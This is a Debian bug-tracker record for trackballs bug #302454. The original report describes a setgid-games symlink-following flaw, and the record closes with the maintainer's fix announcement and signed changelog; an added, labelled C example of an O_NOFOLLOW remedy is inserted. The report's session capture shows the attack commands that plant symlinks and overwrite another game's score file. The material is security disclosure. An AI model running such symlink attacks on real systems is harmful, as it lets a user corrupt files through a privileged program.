Your message dated Sun, 08 May 2005 19:32:19 -0400
with message-id <[EMAIL PROTECTED]>
and subject line Bug#302454: fixed in trackballs 1.0.0-10
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--------------------------------------
Received: (at submit) by bugs.debian.org; 31 Mar 2005 21:54:43 +0000
Date: Thu, 31 Mar 2005 23:54:11 +0200
From: Ulf Harnhammar <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: trackballs: Follows symlinks as gid games

Subject: trackballs: Follows symlinks as gid games
Package: trackballs
Version: 1.0.0-9
Severity: important
Tags: security

Hello,

I have found that trackballs follows symlinks when running as gid games. It writes
to files such as $HOME/.trackballs/[USERNAME].gmr and $HOME/.trackballs/settings
without checking if they are symlinks somewhere else. This can be abused for
overwriting or creating files wherever the games group is allowed to do so.

One way to solve the problem is to make sure that these files are not symlinks.

Here is a session capture showing this problem:


$ dpkg -l trackballs
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Installed/Config-files/Unpacked/Failed-config/Half-installed
|/ Err?=(none)/Hold/Reinst-required/X=both-problems (Status,Err: uppercase=bad)
||/ Name                              Version                           Description
+++-=================================-=================================-==================================================================================
ii  trackballs                        1.0.0-9                           An OpenGL-based game of marbles through a labyrinth
$ rm -rf ~/.trackballs
$ mkdir ~/.trackballs
$ ln -s /var/games/gnometris.scores ~/.trackballs/metaur.gmr
$ ln -s /tmp/testing ~/.trackballs/settings
$ ls -al /tmp/testing
ls: /tmp/testing: No such file or directory
$ cat /var/games/gnometris.scores
31.000000 1105059399 Ulf Harnhammar
$ ls -al ~/.trackballs/
total 12
drwxr-xr-x   2 metaur metaur 4096 2005-03-31 23:22 .
drwxr-xr-x  68 metaur metaur 8192 2005-03-31 23:22 ..
lrwxrwxrwx   1 metaur metaur   27 2005-03-31 23:22 metaur.gmr -> /var/games/gnometris.scores
lrwxrwxrwx   1 metaur metaur   12 2005-03-31 23:22 settings -> /tmp/testing
$ trackballs -w
Welcome to Trackballs.
Using /usr/share/games/trackballs as gamedata dir
Warning: Rescaling images before loading them as textures.
Attempting to open mixer...open /dev/sequencer: No such file or directory
successfull
Warning. Ignoring outdated player profile for player metaur
Warning. Ignoring outdated player profile for player metaur
Trackballs initialization successfull
Killed
$ cat /var/games/gnometris.scores
^_M-^K^H^CM-eM-^U1^NM-B0^LE^C^KM-WM-p^Uz^CJ^E^ClM-$^R#
4M-$M-^A4M-)M-^R^T^DM-''U+1M-1M-DM-#-yM-5M-,M-wM-dM-o%M-{_M-+M-T%^Xg^UM-<=
M-D^[ZM-WIFM--^VM-)[EMAIL PROTECTED]@M-dM=
[EMAIL 
PROTECTED]){M-DM-^LM-+M-3(^I<za^UEM-z?^GEM-^H0sM-p93^ZM-^\^BM-65:M-R509M-(DM-^H=
^F^AAM-^N^L^Q^ZM-F,M-ZM-9M-A^CM-^W"8^[HM-~^CmcM-^^ELuKM-|f|M-g^\^UM-{M-!M=
-k^YM-q;M-XxM-]`M-bM-xM-^^^XbM-RM-hM- [EMAIL PROTECTED]
-~M-A^WgM-ejM-GM-<
$ ls -al /tmp/testing
-rw-r--r--  1 metaur games 80 2005-03-31 23:23 /tmp/testing
$ cat /tmp/testing
[EMAIL PROTECTED]@M-^?M-^?M-^?^?$
$


// Ulf Härnhammar for the Debian Security Audit Project
   http://www.debian.org/security/audit/

-- System Information:
Debian Release: 3.1
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.6.8-2-686
Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1)

Versions of packages trackballs depends on:
ii  guile-1.6-lib 1.6.7-1                    Main Guile libraries
ii  libc6         2.3.2.ds1-20               GNU C Library: Shared libraries an
ii  libgcc1       1:3.4.3-6                  GCC support library
ii  libguile-ltdl 1.6.7-1                    Guile's patched version of libtool
ii  libqthreads-1 1.6.7-1                    QuickThreads library for Guile
ii  libsdl-image1 1.2.4-1                    image loading library for Simple D
ii  libsdl-mixer1 1.2.6-1                    mixer library for Simple DirectMed
ii  libsdl-ttf2.0 2.0.6-5                    ttf library for Simple DirectMedia
ii  libsdl1.2debi 1.2.7+1.2.8cvs20041007-4.1 Simple DirectMedia Layer
ii  libstdc++5    1:3.3.5-8                  The GNU Standard C++ Library v3
ii  trackballs-da 1.0.0-7                    Data files for trackballs
ii  xlibmesa-gl [ 4.3.0.dfsg.1-10            Mesa 3D graphics library [XFree86]
ii  xlibmesa-glu  4.3.0.dfsg.1-10            Mesa OpenGL utility library [XFree
ii  zlib1g        1:1.2.2-3                  compression library - runtime

-- no debconf information
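
The remedy suggested in the report above (make sure these files are not symlinks), as an added C example. It is not part of the original messages and is not the trackballs or upstream CVS code; the function names and the /tmp demo directory are assumptions. It opens with O_NOFOLLOW so the symlink check and the open are one step, then inspects the opened file with fstat().

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper (not trackballs code). Returns an fd, or -1 with errno set. */
int open_profile_nofollow(const char *path)
{
    struct stat st;
    /* O_NOFOLLOW: the kernel refuses a symlink in the final component (ELOOP),
     * so there is no gap between a separate lstat() check and the open. */
    int fd = open(path, O_WRONLY | O_CREAT | O_NOFOLLOW | O_CLOEXEC, 0644);
    if (fd < 0) return -1;
    /* Verify the object actually opened: a regular file with one link,
     * owned by the invoking user. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_nlink != 1 || st.st_uid != getuid()) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Constructed scenario mirroring the session capture: with plant_link set,
 * "settings" is a symlink to a file that does not exist yet. Returns 0 if the
 * open succeeded, errno if refused, -1 on setup failure or a followed link. */
int demo_open(int plant_link)
{
    char dir[] = "/tmp/nofollow-demo-XXXXXX", path[64], target[64];
    if (!mkdtemp(dir))
        return -1;
    snprintf(path, sizeof path, "%s/settings", dir);
    snprintf(target, sizeof target, "%s/testing", dir);
    if (plant_link && symlink(target, path) != 0)
        return -1;
    int fd = open_profile_nofollow(path);
    int result = fd >= 0 ? 0 : errno;
    if (access(target, F_OK) == 0)
        result = -1;                 /* the link target was created */
    if (fd >= 0) close(fd);
    unlink(path);
    unlink(target);
    rmdir(dir);
    return result;
}
```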


---------------------------------------
Received: (at 302454-close) by bugs.debian.org; 8 May 2005 23:42:29 +0000
From: Ari Pollak <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.55 $
Subject: Bug#302454: fixed in trackballs 1.0.0-10
Message-Id: <[EMAIL PROTECTED]>
Sender: Archive Administrator <[EMAIL PROTECTED]>
Date: Sun, 08 May 2005 19:32:19 -0400

Source: trackballs
Source-Version: 1.0.0-10

We believe that the bug you reported is fixed in the latest version of
trackballs, which is due to be installed in the Debian FTP archive:

trackballs-data_1.0.0-10_all.deb
  to pool/main/t/trackballs/trackballs-data_1.0.0-10_all.deb
trackballs_1.0.0-10.diff.gz
  to pool/main/t/trackballs/trackballs_1.0.0-10.diff.gz
trackballs_1.0.0-10.dsc
  to pool/main/t/trackballs/trackballs_1.0.0-10.dsc
trackballs_1.0.0-10_i386.deb
  to pool/main/t/trackballs/trackballs_1.0.0-10_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Ari Pollak <[EMAIL PROTECTED]> (supplier of updated trackballs package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160

Format: 1.7
Date: Sun,  8 May 2005 18:49:27 -0400
Source: trackballs
Binary: trackballs trackballs-data
Architecture: source i386 all
Version: 1.0.0-10
Distribution: unstable
Urgency: low
Maintainer: Ari Pollak <[EMAIL PROTECTED]>
Changed-By: Ari Pollak <[EMAIL PROTECTED]>
Description: 
 trackballs - An OpenGL-based game of marbles through a labyrinth
 trackballs-data - Data files for trackballs
Closes: 302454
Changes: 
 trackballs (1.0.0-10) unstable; urgency=low
 .
   * Backport symlink checking code from upstream CVS (Closes: #302454)
   * Don't bother running the script to install a GNOME .desktop file
     since it doesn't work anyway
Files: 
 3926533d9d13915fc596b4af9d01adee 733 games extra trackballs_1.0.0-10.dsc
 d5f96e993a63cb62b10f8ebd7d1329cd 65227 games extra trackballs_1.0.0-10.diff.gz
 85f3e07df41917c9d8e619326de9f250 158428 games extra trackballs_1.0.0-10_i386.deb
 df8f6e943d426bdbc23cccb7e1faf7b5 4545242 games extra trackballs-data_1.0.0-10_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.0 (GNU/Linux)

iD8DBQFCfp1FwO+u47cOQDsRA8wQAJsEAEiB2d1UNb7JzBxvlzwbKgGRswCbBtGd
2OB7HrW7n+R9I8gPj5fRzKA=
=lJc6
-----END PGP SIGNATURE-----

